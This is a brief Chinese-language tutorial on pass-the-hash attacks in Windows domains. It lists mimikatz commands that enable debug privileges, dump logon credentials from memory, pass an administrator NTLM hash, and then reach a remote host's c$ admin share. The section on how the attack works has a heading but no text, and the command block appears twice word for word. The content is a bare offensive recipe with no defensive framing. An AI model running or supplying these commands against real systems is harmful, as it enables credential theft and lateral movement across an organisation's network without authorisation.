一、哈希传递原理简介
二、常用工具mimikatz
前提:拿下域内某主机管理员权限,运行mimikatz
命令:
privilege::debug 提权
sekurlsa::logonpasswords 获取内存中保存的登录信息
sekurlsa::pth /user:administrator /domain:xxxx.com /ntlm:xxxxxxxxxxxxxxxxx
接下来只要按照如下命令字 + 主机ip的形式即可
dir \\xxx.xxx.xxx.xxx\c$
前提:拿下域内某主机管理员权限,运行mimikatz
命令:
privilege::debug 提权
sekurlsa::logonpasswords 获取内存中保存的登录信息
sekurlsa::pth /user:administrator /domain:xxxx.com /ntlm:xxxxxxxxxxxxxxxxx
接下来只要按照如下命令字 + 主机ip的形式即可
dir \\xxx.xxx.xxx.xxx\c$